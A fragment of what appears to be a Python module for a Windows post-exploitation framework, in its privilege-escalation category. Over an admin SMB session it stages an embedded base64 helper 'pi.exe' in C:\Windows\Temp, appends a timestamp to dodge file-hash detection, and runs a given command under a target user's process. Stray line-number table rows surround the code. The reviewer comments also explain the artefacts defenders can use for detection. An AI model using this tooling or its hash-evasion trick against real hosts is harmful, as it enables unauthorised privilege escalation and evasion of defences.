| 18 | category = CATEGORY.PRIVILEGE_ESCALATION |
| 19 | |
def options(self, context, module_options):
    r"""
    PID // Process ID for Target User, PID=pid
    EXEC // Command to exec, EXEC='command' Single quote is better to use

    This module reads the executed command output under the name C:\windows\temp\output.txt and deletes it. In case of a possible error, it may need to be deleted manually.
    """
    # NOTE(review): the docstring above is reproduced verbatim. It reads as
    # operator-facing option help and may be shown at runtime -- confirm
    # before rewording it.

    # Fixed share, directory and file name used by the rest of the module.
    # Presumably this is where the helper is staged; the upload itself is
    # outside this block. Being constants, these names (and the output.txt
    # named in the docstring, which may be left behind after a failed run)
    # are stable artefacts to look for on a host.
    self.share = "C$"
    self.tmp_dir = "C:\\Windows\\Temp\\"
    # Everything after the drive colon, i.e. \Windows\Temp\ .
    self.tmp_share = self.tmp_dir.split(":")[1]
    self.pi = "pi.exe"
    self.useembeded = True
    self.cmd = ""
    self.pid = ""

    # Decode the base64 text stored under DATA_PATH into the helper's bytes.
    encoded_path = join(DATA_PATH, "pi_module/pi.bs64")
    with open(encoded_path) as encoded_file:
        helper_bytes = b64decode(encoded_file.read())

    # The suffix is the current local time as 14 ASCII digits, not random
    # data. It changes the whole-file hash whenever the second differs, so a
    # file-hash indicator will not match this helper reliably. The decoded
    # bytes before the suffix are unchanged, so detection should key on
    # content or behaviour instead.
    time_suffix = datetime.now().strftime("%Y%m%d%H%M%S").encode()
    self.pi_embedded = helper_bytes + time_suffix

    # Copy the supplied options over the empty defaults; a missing option
    # leaves the corresponding attribute as "". Values are stored as given,
    # with no validation in this method.
    for option_name, attribute in (("EXEC", "cmd"), ("PID", "pid")):
        if option_name in module_options:
            setattr(self, attribute, module_options[option_name])
| 45 | |
| 46 | def on_admin_login(self, context, connection): |
| 47 | if self.useembeded: |